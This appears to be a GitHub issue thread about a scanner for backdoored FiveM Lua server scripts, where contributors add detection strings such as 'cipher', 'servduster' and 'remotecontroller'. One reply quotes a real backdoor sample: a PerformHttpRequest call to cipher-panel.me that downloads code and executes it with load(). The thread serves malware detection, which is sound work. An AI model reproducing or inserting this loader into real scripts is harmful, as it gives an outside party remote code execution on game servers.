Closed Blitoka33 closed 2 years ago
Which exploits actually employ these strings? as far as i'm aware most exploits dont openly name themselves in the scripts..
Which exploits actually employ these strings? as far as i'm aware most exploits dont openly name themselves in the scripts..
Cipher installs cipher-panel.me performhttprequest into scripts, so it does, servduster is a private one (most likely a cipher copy, from what I saw), I saw in some servers (this is not their real name, just a random domain), remotecontroller is a casual suspicious string, it's a string for some runcode exploits.
the examples of cipher panel payloads i saw were all hexadecimal, that's what the "'68', '74', '74', '70', '73', '3a'"
actually is.
Do you have a sample of these payloads?
Yes I can.
PerformHttpRequest('https://cipher-panel.me/_i/i?to=qJDxOx', function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)
qJDxOx is the userid as far as I know.
I saw it in servers having issues with cipher.
Odd, all cases i saw of it used obfuscated code, i'll merge it anyhow
I just added 3 infected strings, to detect more stuff. "cipher", "servduster", "remotecontroller"